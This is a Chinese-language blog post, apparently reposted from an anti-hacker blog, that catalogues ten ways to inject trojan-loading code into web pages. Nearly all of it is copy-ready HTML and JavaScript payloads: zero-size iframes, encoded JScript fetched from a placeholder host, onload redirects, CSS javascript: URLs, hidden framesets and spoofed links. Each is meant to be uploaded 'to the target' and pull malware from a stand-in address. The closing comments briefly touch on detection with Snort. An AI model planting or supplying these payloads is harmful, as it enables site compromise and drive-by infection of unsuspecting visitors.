Quote: http://anti-hacker.blogspot.com/2007/06/blog-post_22.html

1.  框架掛馬

以下是部份語法:

<iframe src=木馬網址 width=0 height=0></iframe>
2.  JScript 文件掛馬

首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處

document.write(“<iframe width=’0′ height=’0′ src=’木馬網址’></iframe>”);
最後JScript 掛馬的語法為:

以下是部份語法:

<script language=javascript src=xxx.js></script>
3.  JScript 變型加密

以下是部份語法:

<SCRIPT language=”JScript.Encode” src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任何附檔名
4.  body 掛馬

以下是部份語法:

<body onload=”window.location=’木馬網址’;”></body>
5.  隱藏掛馬

以下是部份語法:

top.document.body.innerHTML = top.document.body.innerHTML + ‘ <iframe src=”http://www.xxx.com/muma.htm/”></iframe>’;
6.  CSS 中掛馬

先將製作好的 muma.js 先利用各種方式上傳至目標處

以下是部份語法:

body {
background-image: url(‘javascript:document.write(“<script src=http://www.XXX.net/muma.js></script>”)’)}
7.  JAVA 掛馬

以下是部份語法:

<SCRIPT language=javascript>
window.open (“木馬網址”,””,”toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1″);
</script>
8.  圖片偽裝

以下是部份語法:

<html>
<iframe src=”網馬網址” height=0 width=0></iframe>
<img src=”圖片網址”>
</html>
9.  偽裝呼叫

以下是部份語法:

<frameset rows=”444,0″ cols=”*”>
<frame src=”開啟的網頁” framborder=”no” scrolling=”auto” noresize marginwidth=”0″margingheight=”0″>
<frame src=”網馬網址” frameborder=”no” scrolling=”no” noresize marginwidth=”0″margingheight=”0″>
</frameset>
10.  欺騙超連結網址手法

以下是部份語法:

<a href=”http://www.XYZ.com(迷惑他人超連結網址,故意顯示這個網址卻連向木馬網址)” onMouseOver=”www_163_com(); return true;”> 網頁要顯示的內容 </a>
<SCRIPT Language=”JavaScript”>
function www_XYZ_com ()
{
var url=”真正連的網頁木馬網址”;
open(url,”NewWindow”,”toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10″);
}
</SCRIPT>

 

Related posts 相關文章
Maia Mailguard – 防毒防垃圾信的郵件管理系統
More...
會叫又好用的防毒軟體-Avira AntiVir 出第十版了
More...
錯訊訊息 freshclam – No such file or directory
More...
防毒 + 小紅傘 – 撿免費的序號
More...

作者

留言

改網站目錄權限吧~~~

第3 種最難抓,因為沒法解碼……看到了也不知是啥東西 其他都還好辦,不過像圖嵌語法(還好)還有flash嵌語法的(無解) 以flv的最難解~~~ 對了,你有沒有網頁注入的監視程式啊~

    作者

    1. 我沒有網頁注入的監視程式 2. 不過我會以 snort 為我的方案,但前提要先研究注入時的封包是什麼,才能來作 snort的 rules ~尚未去研究這個動作的人留^^"

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。